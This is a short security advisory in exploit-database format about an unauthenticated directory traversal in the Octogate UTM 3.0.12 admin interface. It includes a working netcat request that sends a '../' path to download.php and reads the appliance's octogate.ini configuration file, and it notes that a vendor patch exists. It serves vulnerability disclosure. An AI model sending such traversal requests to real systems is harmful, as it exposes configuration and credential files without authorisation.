Octogate UTM 3.0.12 - Admin Interface Directory Traversal

# Exploit Title: Octogate UTM Admin Interface Directory Traversal
# Date: 26.08.2015
# Software Link: http://www.octogate.com
# Exploit Author: Oliver Karow
# Contact: [email protected]
# Website: http://www.oliverkarow.de
# Category: Remote Exploit


Affected Products/Versions
--------------------------

Product Name: Octogate
Version: 3.0.12 - Virtual Appliance & Appliance


Product/Company Information
---------------------------

Octogate is a UTM Device, including the following features: Application
Firewall, Intrusion Detection and -Prevention, Stateful- & Deep Packet
Inspection, DoS- and DDoS protection and Reverse Proxy.

Octogate IT Security Systems GmbH is based in Germany.


Vulnerability Description
-------------------------

Octogate UTM Device is managed via web interface. The download function
for SSL-Certifcate and Documentation is accessable without
authentication, and allows access to files outside of the web root via
the script /scripts/download.php.

Example request:

echo -en
"GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl
HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer:
http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80

Patch Information
-----------------

Patch is available from vendor.

Advisory Information
--------------------

http://www.oliverkarow.de/research/octogate.txt